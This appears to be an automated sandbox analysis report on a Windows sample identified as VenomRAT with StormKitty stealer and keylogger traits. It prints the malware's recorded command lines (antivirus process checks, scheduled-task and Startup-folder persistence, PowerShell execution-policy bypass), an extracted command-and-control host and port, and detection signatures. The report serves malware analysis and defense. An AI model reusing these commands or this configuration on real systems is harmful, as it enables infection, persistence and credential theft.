
Windows Analysis Report
ADFoyxP.exe

Overview

General Information

Sample name: ADFoyxP.exe
Analysis ID: 1631942
MD5: 45c1abfb717e3ef5223be0bfc51df2de
SHA1: 4c074ea54a1749bf1e387f611dea0d940deea803
SHA256: b01d928331e2b87a961b1a5953bc7dbb8d757c250f1343d731e3b6bb20591243
Tags: AsyncRAT, AutoIT, exe, StormKitty, user-aachum

Detection

KeyLogger, StormKitty, VenomRAT
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Sigma detected: Search for Antivirus process
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected BrowserPasswordDump
Yara detected Keylogger Generic
Yara detected Powershell download and execute
Yara detected StormKitty Stealer
Yara detected VenomRAT
Allocates memory in foreign processes
Bypasses PowerShell execution policy
Creates a thread in another existing process (thread injection)
Drops PE files with a suspicious file extension
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign process
Joe Sandbox ML detected suspicious sample
Maps a DLL or memory area into another process
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
Sigma detected: Suspicious Command Patterns In Scheduled Task Creation
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes many files with high entropy
Writes to foreign memory regions
Wscript called in batch mode (suppress errors)
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected non-DNS traffic on DNS port
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
OS version to string mapping found (often used in BOTs)
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location
Sigma detected: Publisher Attachment File Dropped In Suspicious Location
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sleep loop found (likely to delay execution)
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • ADFoyxP.exe (PID: 2724 cmdline: "C:\Users\user\Desktop\ADFoyxP.exe" MD5: 45C1ABFB717E3EF5223BE0BFC51DF2DE)
    • cmd.exe (PID: 7444 cmdline: "C:\Windows\system32\cmd.exe" /c expand Go.pub Go.pub.bat & Go.pub.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7452 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • expand.exe (PID: 7496 cmdline: expand Go.pub Go.pub.bat MD5: 544B0DBFF3F393BCE8BB9D815F532D51)
      • tasklist.exe (PID: 7544 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 7552 cmdline: findstr /I "opssvc wrsa" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • tasklist.exe (PID: 7588 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 7596 cmdline: findstr "bdservicehost AvastUI AVGUI nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 7652 cmdline: cmd /c md 353090 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • extrac32.exe (PID: 7672 cmdline: extrac32 /Y /E Really.pub MD5: 9472AAB6390E4F1431BAA912FCFF9707)
      • findstr.exe (PID: 7692 cmdline: findstr /V "posted" Good MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 7708 cmdline: cmd /c copy /b 353090\Seat.com + Pf + Somewhere + Volumes + Commission + Lane + Hit + Strong + Copied + Wearing + Acquire 353090\Seat.com MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • cmd.exe (PID: 7724 cmdline: cmd /c copy /b ..\Maintains.pub + ..\Legislation.pub + ..\Blood.pub + ..\Document.pub + ..\Breaks.pub + ..\Both.pub + ..\Explicitly.pub + ..\Governor.pub + ..\Bull.pub + ..\Comparison.pub + ..\Performing.pub + ..\Gate.pub + ..\Republican.pub + ..\Reverse.pub + ..\Thousand.pub + ..\Apartments.pub + ..\Swingers.pub + ..\Urban.pub + ..\Robert.pub + ..\Regulation.pub + ..\Confusion.pub + ..\Listening.pub + ..\Generating.pub + ..\Argentina.pub + ..\Amenities.pub + ..\Vacation.pub + ..\Vampire.pub + ..\Trademarks.pub + ..\Distinguished.pub + ..\Silly.pub + ..\Hell.pub + ..\Worcester.pub + ..\Concept.pub + ..\Enlarge.pub + ..\Preference.pub + ..\Poem.pub m MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Seat.com (PID: 7740 cmdline: Seat.com m MD5: 62D09F076E6E0240548C2F837536A46A)
        • cmd.exe (PID: 7776 cmdline: cmd /c schtasks.exe /create /tn "Coast" /tr "wscript //B 'C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js'" /sc minute /mo 5 /F MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 7784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • schtasks.exe (PID: 7824 cmdline: schtasks.exe /create /tn "Coast" /tr "wscript //B 'C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js'" /sc minute /mo 5 /F MD5: 48C2FE20575769DE916F48EF0676A965)
        • cmd.exe (PID: 7840 cmdline: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TradeHub.url" & echo URL="C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TradeHub.url" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 7848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • RegAsm.exe (PID: 8140 cmdline: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe MD5: 0D5DF43AF2916F47D00C1573797C1A13)
          • cmd.exe (PID: 7676 cmdline: "C:\Windows\System32\cmd.exe" /c start /b powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\curcuma.exe"' & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 2440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • powershell.exe (PID: 7708 cmdline: powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\curcuma.exe"' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
              • curcuma.exe (PID: 7880 cmdline: "C:\Users\user\AppData\Local\Temp\curcuma.exe" MD5: 38C5F131B71B5FDC82CFBA091A2D34A0)
                • chrome.exe (PID: 3528 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" MD5: E81F54E6C1129887AEA47E7D092680BF)
                  • chrome.exe (PID: 7940 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1936,i,5305006061332576876,17319552954880503810,262144 --variations-seed-version --mojo-platform-channel-handle=2236 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)
                • msedge.exe (PID: 5652 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory="Default" MD5: BF154738460E4AB1D388970E1AB13FAB)
                  • msedge.exe (PID: 748 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2300 --field-trial-handle=2096,i,2842194220783237697,10925811508381354400,262144 /prefetch:3 MD5: BF154738460E4AB1D388970E1AB13FAB)
      • choice.exe (PID: 7756 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
  • wscript.exe (PID: 7896 cmdline: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • TradeHub.com (PID: 7944 cmdline: "C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com" "C:\Users\user\AppData\Local\TradeSecure Innovations\F" MD5: 62D09F076E6E0240548C2F837536A46A)
  • wscript.exe (PID: 8008 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • TradeHub.com (PID: 8052 cmdline: "C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com" "C:\Users\user\AppData\Local\TradeSecure Innovations\F" MD5: 62D09F076E6E0240548C2F837536A46A)
  • msedge.exe (PID: 4660 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate MD5: BF154738460E4AB1D388970E1AB13FAB)
    • msedge.exe (PID: 6200 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2752 --field-trial-handle=2228,i,3676741929503588112,17871370342743510954,262144 /prefetch:3 MD5: BF154738460E4AB1D388970E1AB13FAB)
    • msedge.exe (PID: 4116 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6732 --field-trial-handle=2228,i,3676741929503588112,17871370342743510954,262144 /prefetch:8 MD5: BF154738460E4AB1D388970E1AB13FAB)
    • msedge.exe (PID: 5476 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6988 --field-trial-handle=2228,i,3676741929503588112,17871370342743510954,262144 /prefetch:8 MD5: BF154738460E4AB1D388970E1AB13FAB)
    • identity_helper.exe (PID: 6380 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7396 --field-trial-handle=2228,i,3676741929503588112,17871370342743510954,262144 /prefetch:8 MD5: F8CEC3E43A6305AC9BA3700131594306)
    • identity_helper.exe (PID: 7404 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7396 --field-trial-handle=2228,i,3676741929503588112,17871370342743510954,262144 /prefetch:8 MD5: F8CEC3E43A6305AC9BA3700131594306)
  • cleanup
Name: 404 Keylogger, 404KeyLogger, Snake Keylogger
Description: Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim's sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Name: Cameleon, StormKitty
Description: PWC describes this malware as a backdoor, capable of file management, upload and download of files, and execution of commands.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cameleon
{"Host": ["45.95.18.173"], "Port": ["4449"], "Version": "RAT + hVNC  6.0.6", "Install": "false", "Mutex": "vrecmkjrenno", "Certificate": "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", "Server Signature": "oYOqTjVKHp4zYZNcsu6b7PnQbByn94iLY8DZEegmV/zAco8OHoGu0fjzQ41fbgwdTZVeYTto/rUTBR7ZmhIslbI9cROHYMfI8Jg8SOCsGZKMvNM5Yxe4VuIO4ByTkiGRBYRNRdnQoF4two/3vM15gcnDLOWnsjvFYEMdFfPFLrg="}
Source: 00000024.00000002.2543057851.00007FF7C7371000.00000004.00000001.01000000.0000000C.sdmp; Rule: Windows_Trojan_Donutloader_f40e3759; Description: unknown; Author: unknown
  • 0x30c83:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
Source: 00000025.00000002.2542566206.000001FD691D0000.00000040.00000001.00020000.00000000.sdmp; Rule: Windows_Trojan_Donutloader_f40e3759; Description: unknown; Author: unknown
  • 0x30693:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
Source: 0000001E.00000002.2513996605.0000000001302000.00000040.00000400.00020000.00000000.sdmp; Rule: JoeSecurity_VenomRAT; Description: Yara detected VenomRAT; Author: Joe Security
Source: 0000001E.00000002.2513996605.0000000001302000.00000040.00000400.00020000.00000000.sdmp; Rule: JoeSecurity_StormKitty; Description: Yara detected StormKitty Stealer; Author: Joe Security
Source: 0000001E.00000002.2513996605.0000000001302000.00000040.00000400.00020000.00000000.sdmp; Rule: JoeSecurity_CredentialStealer; Description: Yara detected Credential Stealer; Author: Joe Security
Source: 30.2.RegAsm.exe.1300000.1.unpack; Rule: JoeSecurity_VenomRAT; Description: Yara detected VenomRAT; Author: Joe Security
Source: 30.2.RegAsm.exe.1300000.1.unpack; Rule: JoeSecurity_StormKitty; Description: Yara detected StormKitty Stealer; Author: Joe Security
Source: 30.2.RegAsm.exe.1300000.1.unpack; Rule: JoeSecurity_CredentialStealer; Description: Yara detected Credential Stealer; Author: Joe Security
Source: 30.2.RegAsm.exe.1300000.1.unpack; Rule: JoeSecurity_BrowserPasswordDump_1; Description: Yara detected BrowserPasswordDump; Author: Joe Security
Source: 30.2.RegAsm.exe.1300000.1.unpack; Rule: JoeSecurity_Keylogger_Generic_3; Description: Yara detected Keylogger Generic; Author: Joe Security

System Summary

Source: Process started; Author: Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth (Nextron Systems), Christian Burkard (Nextron Systems); Data: Command: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe, CommandLine: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe, ParentCommandLine: Seat.com m, ParentImage: C:\Users\user\AppData\Local\Temp\353090\Seat.com, ParentProcessId: 7740, ParentProcessName: Seat.com, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe, ProcessId: 8140, ProcessName: RegAsm.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: schtasks.exe /create /tn "Coast" /tr "wscript //B 'C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js'" /sc minute /mo 5 /F, CommandLine: schtasks.exe /create /tn "Coast" /tr "wscript //B 'C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js'" /sc minute /mo 5 /F, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: cmd /c schtasks.exe /create /tn "Coast" /tr "wscript //B 'C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js'" /sc minute /mo 5 /F, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7776, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks.exe /create /tn "Coast" /tr "wscript //B 'C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js'" /sc minute /mo 5 /F, ProcessId: 7824, ProcessName: schtasks.exe
Source: Process started; Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton; Data: Command: powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\curcuma.exe"' , CommandLine: powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\curcuma.exe"' , CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c start /b powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\curcuma.exe"' & exit, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7676, ParentProcessName: cmd.exe, ProcessCommandLine: powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\curcuma.exe"' , ProcessId: 7708, ProcessName: powershell.exe
Source: Process started; Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community; Data: Command: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js", CommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1040, ProcessCommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js", ProcessId: 7896, ProcessName: wscript.exe
Source: Process started; Author: Nasreddine Bencherchali (Nextron Systems); Data: Command: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe, CommandLine: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe, ParentCommandLine: Seat.com m, ParentImage: C:\Users\user\AppData\Local\Temp\353090\Seat.com, ParentProcessId: 7740, ParentProcessName: Seat.com, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe, ProcessId: 8140, ProcessName: RegAsm.exe
Source: File created; Author: Nasreddine Bencherchali (Nextron Systems); Data: EventID: 11, Image: C:\Users\user\Desktop\ADFoyxP.exe, ProcessId: 2724, TargetFilename: C:\Users\user\AppData\Local\Temp\Argentina.pub
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: schtasks.exe /create /tn "Coast" /tr "wscript //B 'C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js'" /sc minute /mo 5 /F, CommandLine: schtasks.exe /create /tn "Coast" /tr "wscript //B 'C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js'" /sc minute /mo 5 /F, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: cmd /c schtasks.exe /create /tn "Coast" /tr "wscript //B 'C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js'" /sc minute /mo 5 /F, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7776, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks.exe /create /tn "Coast" /tr "wscript //B 'C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js'" /sc minute /mo 5 /F, ProcessId: 7824, ProcessName: schtasks.exe
Source: Process started; Author: Michael Haag; Data: Command: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js", CommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1040, ProcessCommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js", ProcessId: 7896, ProcessName: wscript.exe
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\curcuma.exe"' , CommandLine: powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\curcuma.exe"' , CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c start /b powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\curcuma.exe"' & exit, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7676, ParentProcessName: cmd.exe, ProcessCommandLine: powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\curcuma.exe"' , ProcessId: 7708, ProcessName: powershell.exe

Data Obfuscation

Source: File created; Author: Joe Security; Data: EventID: 11, Image: C:\Windows\SysWOW64\cmd.exe, ProcessId: 7840, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TradeHub.url

HIPS / PFW / Operating System Protection Evasion

Source: Process started; Author: Joe Security; Data: Command: findstr "bdservicehost AvastUI AVGUI nsWscSvc ekrn SophosHealth" , CommandLine: findstr "bdservicehost AvastUI AVGUI nsWscSvc ekrn SophosHealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /c expand Go.pub Go.pub.bat & Go.pub.bat, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7444, ParentProcessName: cmd.exe, ProcessCommandLine: findstr "bdservicehost AvastUI AVGUI nsWscSvc ekrn SophosHealth" , ProcessId: 7596, ProcessName: findstr.exe

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-03-07T17:34:20.204153+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.6 | 62055 | 104.21.32.1 | 443 | TCP
2025-03-07T17:34:23.352642+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.6 | 62056 | 104.21.32.1 | 443 | TCP
2025-03-07T17:34:25.808619+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.6 | 62057 | 104.21.32.1 | 443 | TCP
2025-03-07T17:35:04.990412+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.6 | 62184 | 104.21.32.1 | 443 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-03-07T17:34:04.092354+0100 | 2842478 | 1 | Malware Command and Control Activity Detected | 45.95.18.173 | 4449 | 192.168.2.6 | 49690 | TCP
2025-03-07T17:34:09.815827+0100 | 2842478 | 1 | Malware Command and Control Activity Detected | 45.95.18.173 | 4449 | 192.168.2.6 | 62054 | TCP


AV Detection

                  Source: 30.2.RegAsm.exe.1300000.1.unpackMalware Configuration Extractor: VenomRAT {"Host": ["45.95.18.173"], "Port": ["4449"], "Version": "RAT + hVNC 6.0.6", "Install": "false", "Mutex": "vrecmkjrenno", "Certificate": "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", "Server Signature": "oYOqTjVKHp4zYZNcsu6b7PnQbByn94iLY8DZEegmV/zAco8OHoGu0fjzQ41fbgwdTZVeYTto/rUTBR7ZmhIslbI9cROHYMfI8Jg8SOCsGZKMvNM5Yxe4VuIO4ByTkiGRBYRNRdnQoF4two/3vM15gcnDLOWnsjvFYEMdFfPFLrg="}
                  Source: ADFoyxP.exeVirustotal: Detection: 27%Perma Link
                  Source: ADFoyxP.exeReversingLabs: Detection: 13%
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 96.8% probability
                  Source: 30.2.RegAsm.exe.1300000.1.unpackString decryptor: 4449
                  Source: 30.2.RegAsm.exe.1300000.1.unpackString decryptor: 45.95.18.173
                  Source: 30.2.RegAsm.exe.1300000.1.unpackString decryptor: RAT + hVNC 6.0.6
                  Source: 30.2.RegAsm.exe.1300000.1.unpackString decryptor: false
                  Source: 30.2.RegAsm.exe.1300000.1.unpackString decryptor: vrecmkjrenno
                  Source: 30.2.RegAsm.exe.1300000.1.unpackString decryptor: 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
                  Source: 30.2.RegAsm.exe.1300000.1.unpackString decryptor: oYOqTjVKHp4zYZNcsu6b7PnQbByn94iLY8DZEegmV/zAco8OHoGu0fjzQ41fbgwdTZVeYTto/rUTBR7ZmhIslbI9cROHYMfI8Jg8SOCsGZKMvNM5Yxe4VuIO4ByTkiGRBYRNRdnQoF4two/3vM15gcnDLOWnsjvFYEMdFfPFLrg=
                  Source: 30.2.RegAsm.exe.1300000.1.unpackString decryptor: null
                  Source: 30.2.RegAsm.exe.1300000.1.unpackString decryptor: false
                  Source: 30.2.RegAsm.exe.1300000.1.unpackString decryptor: false
                  Source: 30.2.RegAsm.exe.1300000.1.unpackString decryptor: install
                  Source: 30.2.RegAsm.exe.1300000.1.unpackString decryptor: false
                  Source: 30.2.RegAsm.exe.1300000.1.unpackString decryptor: true
                  Source: ADFoyxP.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.6:62055 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.6:62056 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.6:62057 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.6:62184 version: TLS 1.2
                  Source: ADFoyxP.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: _C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2: source: curcuma.exe, 00000024.00000002.2520369587.000002428EFD2000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: a\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1 source: curcuma.exe, 00000024.00000003.2455292605.000002428F089000.00000004.00000020.00020000.00000000.sdmp
